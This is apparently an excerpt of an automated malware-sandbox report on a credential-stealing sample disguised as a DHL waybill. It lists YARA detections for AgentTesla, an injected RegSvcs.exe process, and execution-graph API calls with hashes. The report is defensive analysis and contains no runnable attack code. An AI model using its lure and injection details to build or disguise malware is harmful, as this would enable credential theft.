                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xe30000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false


                                            Execution Graph

                                            Execution Coverage:11.3%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:81
                                            Total number of Limit Nodes:2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02D359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02D359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0

                                            Control-flow Graph

                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 053E4101
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 0c49132df491521199b001de71dea23697a300926216dacc2956d6c3b41460b7
                                            • Instruction ID: 22954527deb00e2d9c9b2016fc0a985b2ae87e80a680c473c7ce516707b9890e
                                            • Opcode Fuzzy Hash: 0c49132df491521199b001de71dea23697a300926216dacc2956d6c3b41460b7
                                            • Instruction Fuzzy Hash: 2341F5B8900359CFCB14CF99C888AAAFBF5FB88314F25C459D519AB361D775A841CFA0

                                            Control-flow Graph

                                            control_flow_graph 626 2d3d751-2d3d758 627 2d3d714-2d3d724 DuplicateHandle 626->627 628 2d3d75a-2d3d87e 626->628 629 2d3d726-2d3d72c 627->629 630 2d3d72d-2d3d74a 627->630 629->630
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D656,?,?,?,?,?), ref: 02D3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 74f400410f8af67a4ae87ebeae4df59ca223464b574aa4c987df11e7baeef36f
                                            • Instruction ID: 4ef1f4f10c4a9cfb5f62c122d3ed5b7be119442acfdc274798884b0e8e1ba380
                                            • Opcode Fuzzy Hash: 74f400410f8af67a4ae87ebeae4df59ca223464b574aa4c987df11e7baeef36f
                                            • Instruction Fuzzy Hash: A231C174A80381DFEB449F64E4597793BAAFB84315F528435F9218F7C8CAB00895CF20

                                            Control-flow Graph

                                            control_flow_graph 644 2d3d27c-2d3d724 DuplicateHandle 646 2d3d726-2d3d72c 644->646 647 2d3d72d-2d3d74a 644->647 646->647
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D656,?,?,?,?,?), ref: 02D3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 25ca100e2e4ffe1dbc10bbfe203341c31828750b4e971ca229d3279d13ea2ce0
                                            • Instruction ID: 090836c0167286f9edd015fcf51887f609e69bb71ec93007bd08b9a01faa35d5
                                            • Opcode Fuzzy Hash: 25ca100e2e4ffe1dbc10bbfe203341c31828750b4e971ca229d3279d13ea2ce0
                                            • Instruction Fuzzy Hash: A82103B5D002489FDB10CF9AD884ADEFBF9EB48310F10805AE919A3310D374A950CFA5

                                            Control-flow Graph

                                            control_flow_graph 650 2d3d689-2d3d724 DuplicateHandle 651 2d3d726-2d3d72c 650->651 652 2d3d72d-2d3d74a 650->652 651->652
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D656,?,?,?,?,?), ref: 02D3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 237d4800a00b3d89dcd28d3a0ffec1cb950dfaf95a2e15eee724788b84763660
                                            • Instruction ID: f502cfe00622c84293b789eb2bac3082d5a60dfe5c3d4f82be9521c3c0d01aab
                                            • Opcode Fuzzy Hash: 237d4800a00b3d89dcd28d3a0ffec1cb950dfaf95a2e15eee724788b84763660
                                            • Instruction Fuzzy Hash: FF2112B5D002499FDB10CFA9D584ADEFBF5EB48314F14805AE818A3310C338A954CF61

                                            Control-flow Graph

                                            control_flow_graph 655 2d3a130-2d3b260 657 2d3b262-2d3b265 655->657 658 2d3b268-2d3b297 LoadLibraryExW 655->658 657->658 659 2d3b2a0-2d3b2bd 658->659 660 2d3b299-2d3b29f 658->660 660->659
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02D3B079,00000800,00000000,00000000), ref: 02D3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 330d5c7615ca4a0f251dfff94e19a4865ccbb2ed42670b69e134b7ccabc75682
                                            • Instruction ID: 1c06a4772370e1ee25aca4b87f9b5314c05e201061bc5a2bf16d84f8490595b9
                                            • Opcode Fuzzy Hash: 330d5c7615ca4a0f251dfff94e19a4865ccbb2ed42670b69e134b7ccabc75682
                                            • Instruction Fuzzy Hash: A21100BAD002499FCB10CF9AD448A9EFBF4EB88314F10856AE919A7710C375A945CFA5

                                            Control-flow Graph

                                            control_flow_graph 663 2d3b218-2d3b260 664 2d3b262-2d3b265 663->664 665 2d3b268-2d3b297 LoadLibraryExW 663->665 664->665 666 2d3b2a0-2d3b2bd 665->666 667 2d3b299-2d3b29f 665->667 667->666
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02D3B079,00000800,00000000,00000000), ref: 02D3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: e668eabbcd11f9dff95cbe9f6def6228919c43ea612e4dfdb40a5cf01b83654a
                                            • Instruction ID: 5e18d853749a1b991bf9ad785687758f0847bfedde437c96390693e788f8d088
                                            • Opcode Fuzzy Hash: e668eabbcd11f9dff95cbe9f6def6228919c43ea612e4dfdb40a5cf01b83654a
                                            • Instruction Fuzzy Hash: 9C1112BAC003498FDB10CFAAD584BDEFBF4BB48314F10856AD419A7600C374A945CFA5

                                            Control-flow Graph

                                            control_flow_graph 670 2d3af98-2d3afd8 671 2d3afe0-2d3b00b GetModuleHandleW 670->671 672 2d3afda-2d3afdd 670->672 673 2d3b014-2d3b028 671->673 674 2d3b00d-2d3b013 671->674 672->671 674->673
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 3c7b3ee8e8cce20a6422e8e015e35e37685704f00e5091009ac5bbc841095802
                                            • Instruction ID: 004ffb3b82b2b43fd5a74320c759ce232580aeb64e59324788ba3abce9c08180
                                            • Opcode Fuzzy Hash: 3c7b3ee8e8cce20a6422e8e015e35e37685704f00e5091009ac5bbc841095802
                                            • Instruction Fuzzy Hash: 4E1110B6C002498FCB10CF9AC444BDEFBF4EB88318F10845AD429A7710D375A945CFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 97e40b662bf0c7d7c30851292ac55979293501c09c40c7c9807219c7bb5471d1
                                            • Instruction ID: a6ed44560b4893c7ea233eaa6d9eb45e426aacdf53681b1f8c8e5550266b996c
                                            • Opcode Fuzzy Hash: 97e40b662bf0c7d7c30851292ac55979293501c09c40c7c9807219c7bb5471d1
                                            • Instruction Fuzzy Hash: 6F41A274E05219CFDB08CFE9D4859FEBBB6FF49710F205029E509AB251C7319985DB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: ecdfa8ef68471173a50de539ab47a0bbfa71fb7ded149753e7e12caa33f545f5
                                            • Instruction ID: 90950edbf66a5fc9f72baa195e1bbda9746fcf18a2b2f19ddf6ddb8bf3b94181
                                            • Opcode Fuzzy Hash: ecdfa8ef68471173a50de539ab47a0bbfa71fb7ded149753e7e12caa33f545f5
                                            • Instruction Fuzzy Hash: A731C174E05218CFDB04CFA9D885AEEBBB6BF89700F109029E919AB261C7319945CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: ce93fc27b96e62264fc2b3f585ad2f1abd93a56b48aa9539af1967f83c50d61a
                                            • Instruction ID: 1126dd25021d0243534454b5ce248c76b8ca9daa4f640a6ce88e11ae9e861af3
                                            • Opcode Fuzzy Hash: ce93fc27b96e62264fc2b3f585ad2f1abd93a56b48aa9539af1967f83c50d61a
                                            • Instruction Fuzzy Hash: 12211970E052588FDB08DFEAC4456EEBFF7AF89700F14842AC419AB358DB705946CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 57fdea032c88953dcd08afdedac74f41fb7eb43b7252b7c60353d9e804c3412e
                                            • Instruction ID: 64e45171bea647be5143795c8cf7e3c01dba25f12a08ba3410e01bf21cc1abd6
                                            • Opcode Fuzzy Hash: 57fdea032c88953dcd08afdedac74f41fb7eb43b7252b7c60353d9e804c3412e
                                            • Instruction Fuzzy Hash: 6921E7B0E046188BDB08DFEAC5456EEBBF6AF88700F10C02AC419AB358DB701946CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce1e4a4bf9074201377fc3d324046b91ca54f57d84159b4027912d4bb17f4829
                                            • Instruction ID: 2731a4a74fa40b449dfafd399674c6bd1571bb14e83a25dde22bd3fa3b52e214
                                            • Opcode Fuzzy Hash: ce1e4a4bf9074201377fc3d324046b91ca54f57d84159b4027912d4bb17f4829
                                            • Instruction Fuzzy Hash: 3651A071B082258FCF15AFBCC455ABEBAB7AB88710F10096DD416AB391DF319E4187A1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebba2016802cdf900d99fe9d2cceff05e8d1fbcf33837549c3b035a38c7b8f2f
                                            • Instruction ID: 254b69b9d762a782d162c3cf4a3f404d0bb0ba34385d7cf4c35b34ee01473639
                                            • Opcode Fuzzy Hash: ebba2016802cdf900d99fe9d2cceff05e8d1fbcf33837549c3b035a38c7b8f2f
                                            • Instruction Fuzzy Hash: 1151F875B042269FCB18DF7DC8569BEBBF7BF8A200B10846AD455DB351DA348C41CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 198942d831f558044b7d467594764272824c108a939d8c9760bc1f3b7d754d4f
                                            • Instruction ID: 33e91198b75b0da5297dab6fb08cd5e822836a49e898f9b32c5c134591c5692c
                                            • Opcode Fuzzy Hash: 198942d831f558044b7d467594764272824c108a939d8c9760bc1f3b7d754d4f
                                            • Instruction Fuzzy Hash: 93413A74E092188FCB04CFAEC445AFEBBF6AB8C311F14E06AD519A7211D7749941CB64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 087ceaa03458c2bbf814dcc8bafc4e290eb12fd529c7842e3dcd71dc68b69950
                                            • Instruction ID: 1bb21498392e82447ef770dd6434a69b04d0870a449d6efcde06a27c127d3203
                                            • Opcode Fuzzy Hash: 087ceaa03458c2bbf814dcc8bafc4e290eb12fd529c7842e3dcd71dc68b69950
                                            • Instruction Fuzzy Hash: F6414D74E09258CFCB04CFADC449ABEBBF6AF89301F14E4A9D909A7251D7749941CB60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e87b7b550510abcfe3aadcda5cf663290d5831c762fd46881471cd0d1399cc1f
                                            • Instruction ID: b8cb72da2a378fec9aa787b7fb3925075d34586c945f5b65c17ec2ded7dba010
                                            • Opcode Fuzzy Hash: e87b7b550510abcfe3aadcda5cf663290d5831c762fd46881471cd0d1399cc1f
                                            • Instruction Fuzzy Hash: F7414C74E09218CFCB04CFAEC445AEEBBF6AF8D311F14E06AD919A7251D7748941CB64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7832abfe71ab3c4cae152fdcb4c9bf4955f8d8c4b525942057b7cd859656a016
                                            • Instruction ID: d5ce6c5d165907ca37e343d141ef8cd4099246416882ecb7da0d9d412433ce70
                                            • Opcode Fuzzy Hash: 7832abfe71ab3c4cae152fdcb4c9bf4955f8d8c4b525942057b7cd859656a016
                                            • Instruction Fuzzy Hash: E93107B4E09219DFCB04CF99C5819AEBBF6FF49310F209599D819AB312C770AA41CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a7583812f8fb0d3718e6a38b42bf93786d5df6b4b96b1a451167e8c8384975d
                                            • Instruction ID: 25d07567240037e08d92457968aa5d5c60c9fbe329c249371ae901417bc64325
                                            • Opcode Fuzzy Hash: 5a7583812f8fb0d3718e6a38b42bf93786d5df6b4b96b1a451167e8c8384975d
                                            • Instruction Fuzzy Hash: B2217E30A141289FDB04EBB9D856AEEBBB3FF8C310F505129D502A7284EF305D45CB66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d34ff761abed5a4d01cee0adef1a03981e8939645b0df2814dae0f81379dc0e7
                                            • Instruction ID: 4f0308576c19e909ba78542f7b0cf39c78921d49a71abf5a63469254eb7cb841
                                            • Opcode Fuzzy Hash: d34ff761abed5a4d01cee0adef1a03981e8939645b0df2814dae0f81379dc0e7
                                            • Instruction Fuzzy Hash: BE2106B1904280DFEB06DF94D9C4B17BFA5FB98314F24866AE9090B366C33AD416CB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10b6bb8ddfa926b4c776b1555fa959f5a299bbde47fb488e93d2eb00f78d3be1
                                            • Instruction ID: bffd718c41b61fa79485a84ed514f4f7ee3f821230064eebd534590bbd281aef
                                            • Opcode Fuzzy Hash: 10b6bb8ddfa926b4c776b1555fa959f5a299bbde47fb488e93d2eb00f78d3be1
                                            • Instruction Fuzzy Hash: B721C4B1904240DFEB05DF98D9C4B2BBFA5FB98324F24C56AED050A266C336D416CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a78bd278807143c4dde892c6c156a98d6b473b2cf413e41568230d2fdb94386
                                            • Instruction ID: 3990e41f14d7937084c3c2ef9e0439b32decc27c29b466956db2790e25854508
                                            • Opcode Fuzzy Hash: 2a78bd278807143c4dde892c6c156a98d6b473b2cf413e41568230d2fdb94386
                                            • Instruction Fuzzy Hash: 2F21D3B1A04240EFEB05DF58D9C0B27BF65FB98318F24C56AE9090B366C736D456CAA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d81c3ed88cdff968f2c399a55e0c663c615f4199e1b0a337f945615cc66ec4c8
                                            • Instruction ID: 560bb3ebbf9734f3e4c0467ad1e7569ed41a925c066507da6725a702f1b713c4
                                            • Opcode Fuzzy Hash: d81c3ed88cdff968f2c399a55e0c663c615f4199e1b0a337f945615cc66ec4c8
                                            • Instruction Fuzzy Hash: B8312CB4D09259DFCB40DFA8C1829AEBBF5FF49310F20919AD419A7752D7709E40CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086513930.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_145d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • API String ID:
                                            • Opcode ID: 07173e97a124bb85bbcb95a5eaef20336a247cfddae9ceefac52ac357dce3864
                                            • Instruction ID: 882dfe3177deb598e5dd3cebd19537117e6a9af20728327cee8db4d296420f72
                                            • Opcode Fuzzy Hash: 07173e97a124bb85bbcb95a5eaef20336a247cfddae9ceefac52ac357dce3864
                                            • Instruction Fuzzy Hash: B9E092B0D40219AFD780EFAAC909A5EBBF2BB08A00F1189A9D419E7251E77496458F91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c07c0be3a5d114f1f6622009f502ded3ae81a864dd850dfd6a65e3ce0d97fdd6
                                            • Instruction ID: b4251309f94a638523bc3bb461e7430f768739d2a529601e45bb78c5b365721f
                                            • Opcode Fuzzy Hash: c07c0be3a5d114f1f6622009f502ded3ae81a864dd850dfd6a65e3ce0d97fdd6
                                            • Instruction Fuzzy Hash: 73E01A30509228CFC7509F24D18AA687B7AFF0A312F0068E4E40E6E262CB328C44CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b34948e747244f3c1312616f073171318382e34710bd72d8fb815e007d1fa730
                                            • Instruction ID: c2350ea46472fb6afc0c7f26175de58b0ac22d90d9c0c2a9557d75e6a552401c
                                            • Opcode Fuzzy Hash: b34948e747244f3c1312616f073171318382e34710bd72d8fb815e007d1fa730
                                            • Instruction Fuzzy Hash: C9D0A76105D5CC1FCB1117B4BDAE4387F349D4B1117081FD7E495CB093C1104891C3D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba98f43541688c1b899b014570bf93e9775dcdb3a8e11293ea6ea6d81edf27d1
                                            • Instruction ID: 11c24079dc1ba771aa52aa3b0016d6eae70635ce3cbcf16af1dec6267172e638
                                            • Opcode Fuzzy Hash: ba98f43541688c1b899b014570bf93e9775dcdb3a8e11293ea6ea6d81edf27d1
                                            • Instruction Fuzzy Hash: E5D01770C1621CEBCB04EFA8E54A6ADBF74FB45312F2081A9E80427240CB715E94DBE6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e74a50c5d3c32d17d481577480c882d7aa0ff3d56e7a4ad68da526f6e3e1ba0d
                                            • Instruction ID: 54469dcc199b147ae5679d6488b5bb1cf2f830e0ef3da982fe98b7315615a150
                                            • Opcode Fuzzy Hash: e74a50c5d3c32d17d481577480c882d7aa0ff3d56e7a4ad68da526f6e3e1ba0d
                                            • Instruction Fuzzy Hash: 53C08C300026089BC70437A9F50FB243AB8A700326F046420F109010108FB010A0C6B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34a07c8f43f5b0cb8c72355c9a9d66e0a898877930ac6b6fa966b4ea55f20606
                                            • Instruction ID: cdc47bd797ffb08c6bdcea3b287792bcdb377d12c70383ae518492d70fd551d6
                                            • Opcode Fuzzy Hash: 34a07c8f43f5b0cb8c72355c9a9d66e0a898877930ac6b6fa966b4ea55f20606
                                            • Instruction Fuzzy Hash: E0C02B3128140A89F204E734C883F18B2EEF7F0700FB0C001C90888058CB10D402C126
                                            Memory Dump Source
